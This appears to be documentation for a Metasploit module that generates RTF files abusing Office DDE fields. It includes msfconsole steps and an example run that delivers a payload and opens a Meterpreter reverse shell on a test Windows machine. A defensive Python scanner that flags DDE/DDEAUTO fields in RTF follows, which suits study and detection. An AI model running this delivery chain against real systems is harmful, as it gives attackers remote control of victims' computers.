The module abuses a feature in MS Field Equations that allows a user to execute an arbitrary application.
Vulnerable Application
All Microsoft Office versions
Verification Steps
- Start msfconsole
- Do: use exploit/windows/fileformat/office_dde_delivery
- Do: set PAYLOAD [PAYLOAD]
- Do: run
Options
FILENAME
Filename to output, whether injecting or generating a blank one
INJECT_PATH
Path to filename to inject
Example
msf > use exploit/windows/fileformat/office_dde_delivery
msf exploit(office_dde_delivery) > set FILENAME msf.rtf
FILENAME => /home/mumbai/file.rtf
msf exploit(office_dde_delivery) > set LHOST ens3
LHOST => ens3
msf exploit(office_dde_delivery) > set LPORT 35116
LPORT => 35116
msf exploit(office_dde_delivery) > run
[*] Using URL: http://0.0.0.0:8080/DGADAcDZ
[*] Local IP: http://192.168.0.11:8080/DGADAcDZ
[*] Server started.
[*] Handling request for .sct from 192.168.0.24
[*] Delivering payload to 192.168.0.24...
[*] Sending stage (205379 bytes) to 192.168.0.24
[*] Meterpreter session 1 opened (192.168.0.11:35116 -> 192.168.0.24:52217)
meterpreter > sysinfo
Computer : TEST-PC
OS : Windows 7 (Build 7601, Service Pack 1).
Architecture : x64
System Language : en_US
Domain : WORKGROUP
Logged On Users : 1
Meterpreter : x64/windows
meterpreter >
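
Detection
A defender-side check for RTF files like the one generated above, added here as an example and not part of the module or its documentation: it scans RTF text for field instructions whose field code is DDE or DDEAUTO, the field type the module name (office_dde_delivery) refers to. The function names and the sample documents are constructed for this example.

```python
import re

# Assumption of this example: only the two DDE field codes are of interest.
DDE_CODES = {"DDE", "DDEAUTO"}
# An RTF control word (\name, optional numeric argument, one delimiting space)
# or a control symbol such as \* or \{.
CONTROL = re.compile(r"\\[a-zA-Z]+-?\d* ?|\\[^a-zA-Z]")

def fldinst_bodies(rtf):
    """Yield (offset, raw text) for the rest of each group holding \\fldinst."""
    for m in re.finditer(r"\\fldinst(?![a-zA-Z])", rtf):
        depth, i = 1, m.end()
        while i < len(rtf) and depth:
            if rtf[i] == "\\":
                i += 1                      # skip the escaped or control character
            elif rtf[i] == "{":
                depth += 1
            elif rtf[i] == "}":
                depth -= 1
            i += 1
        end = i - 1 if depth == 0 else len(rtf)   # tolerate a truncated file
        yield m.start(), rtf[m.end():end]

def find_dde_fields(rtf):
    """Return [(offset, field code, normalised instruction)] for DDE fields."""
    hits = []
    for offset, body in fldinst_bodies(rtf):
        # Formatting control words, group braces and line breaks do not change
        # the instruction a reader sees, so drop them before comparing.
        text = re.sub(r"[{}\r\n]", "", CONTROL.sub("", body))
        text = " ".join(text.split())
        code = text.split(" ", 1)[0].upper()
        if code in DDE_CODES:
            hits.append((offset, code, text))
    return hits

# Constructed samples with placeholder arguments; none comes from the module.
SAMPLES = {
    "plain": r'{\rtf1{\field{\*\fldinst DDEAUTO "PLACEHOLDER_APP" "PLACEHOLDER_TOPIC"}{\fldrslt }}}',
    "runs": r'{\rtf1{\field{\*\fldinst {\rtlch\fcs1 DDE}{\rtlch\fcs1 AUTO PLACEHOLDER_APP PLACEHOLDER_TOPIC}}{\fldrslt x}}}',
    "benign": r'{\rtf1{\field{\*\fldinst HYPERLINK "https://example.com/"}{\fldrslt link}}{\field{\*\fldinst PAGE}}}',
}

if __name__ == "__main__":
    for name, doc in SAMPLES.items():
        print(name, find_dde_fields(doc))
```

The "runs" sample shows why the instruction is normalised first: a field code split across formatting runs would be missed by a plain substring search for DDEAUTO.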